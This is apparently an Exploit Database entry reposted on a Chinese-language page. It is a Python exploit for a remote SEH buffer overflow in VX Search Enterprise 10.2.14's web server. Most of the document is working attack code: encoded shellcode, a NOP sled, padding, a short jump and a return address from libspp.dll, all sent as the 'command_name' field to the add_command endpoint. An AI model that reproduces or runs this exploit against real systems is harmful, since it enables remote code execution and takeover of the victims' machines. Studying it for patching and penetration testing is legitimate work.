VX Search 10.2.14 – ‘command_name’ Buffer Overflow

• Exploit Database
• 19 阅读

• 作者： W01fier00t
  日期： 2017-12-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43209/

• #!/usr/bin/python
  
  
  print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
  
  # Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
  # Discovery by: W01fier00t
  # Twitter : @wolfieroot
  # Discovery Date: 22/11/2017
  # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
  # Tested Version: 10.2.14
  # Tested on OS: Windows 7 Home Edition sp1
  # You will need to enable web server for this to work.
  # You will also need the Login to VX Search wepage, for this to work.
  
  import urllib
  import urllib2
  import socket
  
  #Bad chars \x00\x0a\x0d
  #Payload size: 351 bytes
  shellcode = (
  "\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
  "\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
  "\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
  "\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
  "\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
  "\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
  "\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
  "\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
  "\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
  "\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
  "\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
  "\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
  "\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
  "\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
  "\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
  "\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
  "\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
  "\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
  "\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
  "\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
  "\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
  "\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
  "\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
  "\xc7\x24\x7d\x0c\xe7\x6c")
  
  #0x1001a136 : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [libspp.dll]
  cmdname = "\x90" *16
  cmdname += shellcode
  cmdname += "A" * 157
  cmdname += "\xEB\x06"
  cmdname += "B" *2
  cmdname += "\x36\xa1\x01\x10"
  
  print " [*] Sending payload!..."
  url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
  values = {'command_name' : cmdname}
  data = urllib.urlencode(values)
  req = urllib2.Request(url, data)
  
  try:
  	response = urllib2.urlopen(req, timeout = 1)
  except socket.timeout:
  	pass
  
  print " [*] DONE! :D\n"